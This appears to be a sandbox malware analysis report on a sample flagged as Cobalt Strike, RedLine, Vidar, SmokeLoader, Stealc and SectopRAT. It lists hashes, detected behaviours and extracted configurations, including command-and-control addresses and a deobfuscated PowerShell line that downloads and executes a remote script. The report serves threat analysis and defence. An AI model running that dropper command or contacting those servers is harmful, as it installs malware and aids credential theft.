Overview

overview

10

Static

static

3

a.exe

windows10-1703-x64

10

Resubmissions

13/06/2023, 15:08 UTC

230613-sh5ehagg67 10

12/06/2023, 12:37 UTC

230612-ptx8sacc46 10

09/06/2023, 19:42 UTC

230609-yevzjsea3z 10

08/06/2023, 16:59 UTC

230608-vhg1bahg5z 10

07/06/2023, 18:26 UTC

230607-w3ealaec62 10

07/06/2023, 18:23 UTC

230607-w1vjsseg31 10

06/06/2023, 14:12 UTC

230606-rjb9nsea66 10

05/06/2023, 13:48 UTC

230605-q395dagh57 10

02/06/2023, 11:55 UTC

230602-n3t22sbe8z 10

30/05/2023, 13:02 UTC

230530-p98pfsaa3x 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a.bin

  • Size

    5KB

  • Sample

    230609-yevzjsea3z

  • MD5

    8ce1f6882edc51f701bbe648e40dd133

  • SHA1

    496b3df4657e9d11df14a8ad267061d97249b511

  • SHA256

    188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

  • SHA512

    5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6

  • SSDEEP

    48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Score
10/10
cobaltstrikeredlinesectopratsmokeloaderstealcvidar01000001223a64ca0c195d3c6bc2a04ada079183388duhatdszxc1backdoorevasioninfostealerratstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
1
invoke-expression (new-object net.webclient).downloadstring("https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1")
2
URLs
ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

cobaltstrike

C2

http://43.153.222.28:4646/c9uL

Attributes
  • user_agent

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)

Extracted

Family

cobaltstrike

Botnet

100000

C2

http://43.153.222.28:4646/push

Attributes
  • access_type

    512

  • host

    43.153.222.28,/push

  • http_header1

    AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_header2

    AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • polling_time

    60000

  • port_number

    4646

  • sc_process32

    %windir%\syswow64\rundll32.exe

  • sc_process64

    %windir%\sysnative\rundll32.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCPwjCZRkIjRN92nugrS5l0384q/BWQnN0JKM8QSNJru7gg5JibPdKhwgWse4/vRHpd9eu0wpSN1kxhMXC0GOhRg/TRyv5q41zzWurCIOHq13S55c+J/27HYD/DBLtL+5BWbXx9lhM38OGBxcVec4FxCLotANPMB+vOv/rVa32tYQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    4096

  • unknown2

    AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /submit.php

  • user_agent

    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)

  • watermark

    100000

Extracted

Family

cobaltstrike

Botnet

0

Attributes
  • watermark

    0

Extracted

Family

redline

Botnet

TDS

C2

51.79.184.226:25676

Attributes
  • auth_value

    e889b0d7bd655b548c29ef635ce69d26

Extracted

Family

vidar

Version

4.2

Botnet

a64ca0c195d3c6bc2a04ada079183388

C2

https://steamcommunity.com/profiles/76561199511129510

https://t.me/rechnungsbetrag
Attributes
  • profile_id_v2

    a64ca0c195d3c6bc2a04ada079183388

  • user_agent

    Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.38 Safari/537.36 Brave/75

Extracted

Family

redline

Botnet

1223

C2

80.85.241.28:36723

Attributes
  • auth_value

    1162933edb12f699eedc4c04dd76667a

Extracted

Family

redline

Botnet

zxc1

C2

194.50.153.103:47128

Attributes
  • auth_value

    842f769e02ef52dcf9aa57e5c8d3d07b

Extracted

Family

smokeloader

Version

2022

C2

http://aapu.at/tmp/

http://poudineh.com/tmp/

http://firsttrusteedrx.ru/tmp/

http://kingpirate.ru/tmp/
rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0

Extracted

Family

stealc

C2

http://45.15.157.6/9827126d94c3e848.php

Extracted

Family

redline

Botnet

duha

C2

83.97.73.129:19068

Attributes
  • auth_value

    aafe99874c3b8854069470882e00246c

Targets

    • Target

      a.bin

    • Size

      5KB

    • MD5

      8ce1f6882edc51f701bbe648e40dd133

    • SHA1

      496b3df4657e9d11df14a8ad267061d97249b511

    • SHA256

      188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

    • SHA512

      5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6

    • SSDEEP

      48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

    Score
    10/10
    cobaltstrikeredlinesectopratsmokeloaderstealcvidar01000001223a64ca0c195d3c6bc2a04ada079183388duhatdszxc1backdoorevasioninfostealerratstealertrojan

    • Cobaltstrike

      Detected malicious payload which is part of Cobaltstrike.

      trojanbackdoorcobaltstrike

    • Detects Stealc stealer

      stealer

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

      infostealerredline

    • RedLine payload

    • SectopRAT

      SectopRAT is a remote access trojan first seen in November 2019.

      trojanratsectoprat

    • SectopRAT payload

    • SmokeLoader

      Modular backdoor trojan in use since 2014.

      trojanbackdoorsmokeloader

    • Stealc

      Stealc is an infostealer written in C++.

      stealerstealc

    • Vidar

      Vidar is an infostealer based on Arkei stealer.

      stealervidar

    • Downloads MZ/PE file

    • Stops running service(s)

      evasion

    • Executes dropped EXE

    • Uses the VBS compiler for execution

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral1

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.